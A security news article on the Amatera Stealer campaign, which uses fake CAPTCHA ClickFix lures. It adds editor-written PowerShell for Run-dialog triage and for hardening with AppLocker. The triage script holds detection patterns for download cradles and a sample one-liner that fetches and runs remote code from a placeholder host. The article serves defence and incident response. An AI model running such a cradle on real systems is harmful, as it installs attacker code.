Cybersecurity researchers have uncovered a malware campaign that uses fake CAPTCHA pages to deploy Amatera Stealer, an information stealer built to target cryptocurrency wallets. Tracked by eSentire as part of the EVALUSION campaign, the malware targets more than 149 browser-based crypto wallets and 43 password managers, and it uses evasion techniques designed to slip past standard security tools.
Amatera is a rebrand of ACR (AcridRain) Stealer, which the threat actor SheldIO sold as malware-as-a-service until July 2024, when the source code changed hands in a private sale. The new version sells for $199 a month or $1,499 a year, putting wallet-stealing capabilities within reach of less sophisticated attackers.
eSentire’s Threat Response Unit documented the campaign in November 2025 after observing multiple infection chains beginning with the ClickFix social engineering tactic. Victims are tricked into executing malicious commands through the Windows Run dialog under the pretense of completing a CAPTCHA verification or fixing a system issue.
How the Attack Works

The infection starts when users visit a compromised website or follow a phishing link posing as a legitimate service. A fake CAPTCHA prompt instructs them to press Windows+R to open the Run dialog, Ctrl+V to paste a command, and Enter to execute it. The page's JavaScript has already placed the malicious command on the clipboard, so the victim never types or reads it; the three-step ritual looks enough like a routine verification that many people comply without question.
Once executed, the command triggers a multi-stage payload delivery chain. A .NET-based downloader retrieves an encrypted payload from file-sharing services like MediaFire, decrypts it using RC2 encryption, and loads a DLL packed with Pure Crypter. The malware uses obfuscated PowerShell code with XOR encryption to bypass Windows Anti-Malware Scan Interface (AMSI).
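The Run dialog keeps a history of what was executed through it, which makes it one of the first artefacts to check on a host suspected of a ClickFix infection. The script below is an added example by the editor, not code from eSentire or from the article: it reads that history (the RunMRU key) and flags entries that look like ClickFix one-liners. The indicator patterns and the constructed sample entries are the editor's assumptions, not commands observed in Amatera infections.

```powershell
# Added example (editor's own, not eSentire's or the article's code).
# Triage HKCU\...\Explorer\RunMRU for ClickFix-style one-liners.
# Indicator patterns and the sample entries below are assumptions, not observed Amatera commands.

$Indicators = @(
    'powershell(\.exe)?\s.*-(w|win|windowstyle)\s+h',          # hidden PowerShell window
    '-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}',         # Base64 -EncodedCommand payload
    'mshta(\.exe)?\s+https?://',                                # remote HTA execution
    '\b(iex|invoke-expression)\b',                              # download cradle executing fetched text
    '\b(irm|iwr|invoke-restmethod|invoke-webrequest|curl|wget)\b',
    'frombase64string',
    'msiexec(\.exe)?\s.*\s/i\s+https?://',                      # remote MSI install
    '#\s*.{0,40}(robot|captcha|verif)'                          # trailing "I am not a robot" comment
)

function Test-ClickFixCommand {
    param([Parameter(Mandatory)][string]$Command)
    # -match is case-insensitive by default, so no (?i) prefix is needed.
    $hits = foreach ($pattern in $Indicators) {
        if ($Command -match $pattern) { $pattern }
    }
    # Decode an -EncodedCommand argument so the analyst sees the real payload (UTF-16LE Base64).
    $decoded = $null
    if ($Command -match '-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})') {
        try   { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) }
        catch { $decoded = '<base64 decode failed>' }
    }
    [pscustomobject]@{
        Suspicious = [bool]$hits
        Indicators = @($hits)
        Decoded    = $decoded
        Command    = $Command
    }
}

function Get-RunMruCommands {
    # Explorer stores each Run entry as "<command>\1" under a single-letter value name;
    # MRUList holds those letters, most recent first.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return }
    $props = Get-ItemProperty -Path $key
    foreach ($letter in ([string]$props.MRUList).ToCharArray()) {
        $entry = $props.PSObject.Properties[[string]$letter]
        if ($entry -and $entry.Value) { [string]$entry.Value -replace '\\1$', '' }
    }
}

# Constructed samples (editor's assumptions) so the check has something to flag on a clean machine.
$Samples = @(
    'notepad',
    'powershell -w hidden -c "irm https://example.invalid/c | iex" # "I am not a robot - Verification ID: 4182"',
    'mshta https://example.invalid/verify.hta'
)

@(Get-RunMruCommands) + $Samples |
    ForEach-Object { Test-ClickFixCommand -Command $_ } |
    Where-Object Suspicious |
    Format-List Command, Indicators, Decoded
```

Run it in the context of the user who saw the prompt (RunMRU lives under HKCU), and on a live incident pair it with the PowerShell operational log and the ScriptBlock log, since the Run dialog entry only shows the first stage of the chain.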
Amatera uses WoW64 SysCalls to bypass the user-mode hooks that sandboxes, antivirus and endpoint detection products rely on, and it overwrites the AmsiScanBuffer string in clr.dll memory so that AMSI no longer scans the later stages. These techniques do not make the malware invisible, but they lower the odds that a fully patched host with current security software catches it before data has already left.
After establishing persistence, Amatera harvests extensive data, including saved passwords, credit cards, browsing history, cryptocurrency wallet files, desktop wallet applications, FTP credentials, email account data, and VPN configurations. The malware specifically targets browser-based wallet extensions for MetaMask, Phantom, Trust Wallet, Coinbase Wallet, and 145 other crypto wallets.
Selective Deployment of Remote Access Tools
What makes this campaign particularly dangerous is Amatera’s built-in logic for selective payload deployment. The malware checks whether the infected machine contains cryptocurrency wallet files or belongs to a corporate domain before deploying additional tools. If neither condition is met, the attack stops at the data exfiltration stage.
For high-value targets, Amatera downloads NetSupport RAT, giving the operators full remote control of the host. eSentire identified the NetSupport configuration's licensee as “KAKAN,” which ties it to the EVALUSION cluster seen in earlier campaigns. Other payloads pushed to valuable targets include the Amadey loader and the Vidar and Lumma stealers.
This selective approach helps attackers avoid detection by focusing resources on machines containing actual crypto assets or corporate networks. Low-value home computers get data scraped, but don’t receive the remote access tool that might trigger security alerts.
Stolen data is compressed into ZIP archives and exfiltrated over TLS with an additional AES-256-CBC layer, so inline inspection cannot recover the contents without the key. The connections themselves remain visible, however: the command-and-control servers at 91.98.229.246 (Hetzner) and 45.94.47.224 (Hosting Industry Ltd) can be blocked and hunted for in proxy and firewall logs.
Multiple Campaign Variants
Security researchers documented several variants of the EVALUSION campaign using different lures and delivery mechanisms. The SmartApeSG variant compromises legitimate websites by injecting malicious JavaScript that redirects visitors to fake ClickFix pages mimicking Cloudflare Turnstile security checks.
Another variant uses fake Booking.com CAPTCHA pages to harvest hotel booking credentials before deploying the stealer. Email campaigns distribute Visual Basic Script attachments disguised as invoices, which execute batch scripts to invoke PowerShell loaders. Spoofed internal corporate email alerts with fake delivery notifications prompt victims to click on malicious links.
The diversity of attack vectors shows coordinated effort by multiple threat actors leveraging the same core malware-as-a-service offering. Amatera’s subscription model enables this distribution, with different criminal groups running their own campaigns using purchased access to the tool.
Why Crypto Wallets Are Prime Targets
Cryptocurrency wallets present uniquely attractive targets for cybercriminals compared to traditional financial accounts. Once attackers obtain private keys or seed phrases, they can transfer funds globally within minutes without intermediaries. Unlike bank fraud, crypto transactions are irreversible. Victims cannot call their bank to reverse fraudulent transfers or recover stolen funds.
A single compromised wallet can yield hundreds of thousands or millions of dollars, depending on the holder’s balance. Malware operators focus their efforts on detecting and extracting wallet files, browser wallet extensions, and private keys rather than low-value personal data.
The decentralized nature of cryptocurrency makes attribution difficult and asset recovery nearly impossible. Stolen funds can be laundered through mixing services, decentralized exchanges, and privacy coins within hours of theft. Law enforcement rarely recovers significant amounts from crypto thefts, even when attackers are eventually identified.
Browser-based wallet extensions store credentials locally, making them vulnerable to malware with sufficient system access. Desktop wallets similarly keep private keys in files that information stealers specifically target. Hardware wallets provide better security, but most users rely on software wallets for daily transactions.
Defense Recommendations
eSentire recommends several defensive measures against ClickFix-based attacks. Organizations should block mshta.exe with AppLocker or Windows Defender Application Control to prevent HTA execution. Removing the Run menu from the Start Menu through Group Policy (a setting that also disables the Windows+R shortcut) shuts the Run-dialog variant of ClickFix, but not lures that have the victim paste the same command into a PowerShell window, the File Explorer address bar or a browser, so it complements application control and user training rather than replacing them.
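As an added example (not eSentire's tooling or the article's code), this is how an administrator would apply those two controls to a single Windows host with PowerShell; the rule names, the temporary file and the AuditOnly choice are the editor's. In a domain, the same NoRun value arrives through the Group Policy setting named above and the AppLocker XML through GPO or Intune; this script is for a test machine or an emergency. AppLocker enforcement is only supported on Enterprise and Education editions.

```powershell
# Added example (editor's own, not eSentire's guidance verbatim): two hardening controls for one host.
# Assumes an elevated session. Rule names, description text and the temp file path are editor's choices.
#Requires -RunAsAdministrator

# 1. "Remove Run menu from Start Menu" (also disables Windows+R). The policy's backing value is
#    HKCU\...\Policies\Explorer\NoRun = 1, per user; Explorer applies it after the user signs out and in.
$policyKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
New-Item -Path $policyKey -Force | Out-Null
Set-ItemProperty -Path $policyKey -Name NoRun -Type DWord -Value 1

function Test-RunDialogDisabled {
    (Get-ItemProperty -Path $policyKey -Name NoRun -ErrorAction SilentlyContinue).NoRun -eq 1
}

# 2. AppLocker deny rules for both copies of mshta.exe. EnforcementMode is AuditOnly on purpose:
#    an Exe collection that holds only deny rules and is set to Enabled blocks every executable
#    that is not explicitly allowed. Merge into a policy that already carries the default allow
#    rules, watch the AppLocker event log, then switch the collection to Enabled.
$denyMshta = @"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="AuditOnly">
    <FilePathRule Id="$([guid]::NewGuid())" Name="Deny mshta.exe (System32)"
                  Description="ClickFix / HTA mitigation" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%SYSTEM32%\mshta.exe" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="$([guid]::NewGuid())" Name="Deny mshta.exe (SysWOW64)"
                  Description="ClickFix / HTA mitigation" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%WINDIR%\SysWOW64\mshta.exe" /></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
"@
$xmlPath = Join-Path $env:TEMP 'deny-mshta.xml'
Set-Content -Path $xmlPath -Value $denyMshta -Encoding UTF8

# AppLocker rules are enforced by the Application Identity service.
Start-Service AppIDSvc -ErrorAction SilentlyContinue
Set-AppLockerPolicy -XmlPolicy $xmlPath -Merge

# Verification: Run dialog policy present, deny rules in the effective policy, mshta evaluated as Denied.
Test-RunDialogDisabled
(Get-AppLockerPolicy -Effective -Xml) -match 'mshta\.exe'
Get-AppLockerFileInformation -Path "$env:SystemRoot\System32\mshta.exe" |
    Test-AppLockerPolicy -XmlPolicy $xmlPath
```

Test-AppLockerPolicy evaluates the file against the XML without enforcing anything, so the last line is a safe way to confirm the rule matches before the collection is ever switched out of audit mode.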
Security awareness training should specifically cover fake CAPTCHA prompts and social engineering tactics that instruct users to open the Run dialog and paste commands. Most legitimate services never require users to execute commands through Windows Run.
Deploying 24/7 managed detection and response alongside next-generation antivirus or endpoint detection products improves the odds against threats that rely on evasion. Signature-based antivirus alone is a poor match for payloads that arrive wrapped in a crypter and are decrypted in memory: the on-disk artefact changes with every build while the behaviour stays the same, so behavioural and memory-based detection is what catches it.
For cryptocurrency holders specifically, using hardware wallets for significant holdings reduces exposure to software-based thieves. Enabling multi-factor authentication on exchange accounts and wallet applications adds another layer of protection. Regularly reviewing authorized applications and browser extensions helps identify suspicious additions.
Network segmentation keeps valuable assets on isolated systems that don’t browse the internet or open email attachments. Air-gapped systems for crypto storage eliminate remote attack vectors entirely, though this creates usability challenges for active traders.
Rising Threat to Crypto Users
The EVALUSION campaign represents the growing sophistication of crypto-targeted malware. As cryptocurrency adoption increases, more users hold significant balances in software wallets vulnerable to information thieves. The malware-as-a-service model enables even inexperienced attackers to deploy sophisticated tools previously available only to advanced persistent threat groups.
Amatera’s selective deployment logic shows attackers optimizing their operations for maximum return. Rather than deploying expensive remote access tools on every infected machine, they focus on high-value targets containing actual crypto assets or corporate network access. This efficiency makes the campaigns more profitable and harder to detect.
The fake CAPTCHA technique exploits user trust in familiar security mechanisms. Users have been conditioned to expect CAPTCHA challenges on websites and may not question prompts that appear related to verification processes. Attackers leverage this conditioning to trick victims into executing malicious commands.
eSentire released a configuration extractor tool to help security researchers analyze Amatera samples and decrypt command-and-control communications. The tool reveals encrypted C2 server addresses and AES keys for network traffic analysis. CyberChef recipes provided by eSentire enable decryption of captured C2 communications for threat intelligence.
For crypto users, the campaign serves as a reminder that software wallets remain vulnerable to advanced malware regardless of security tools installed on the system. Hardware wallets, air-gapped storage, and extreme caution with any prompt requesting command execution remain the most reliable defenses against credential-stealing attacks.
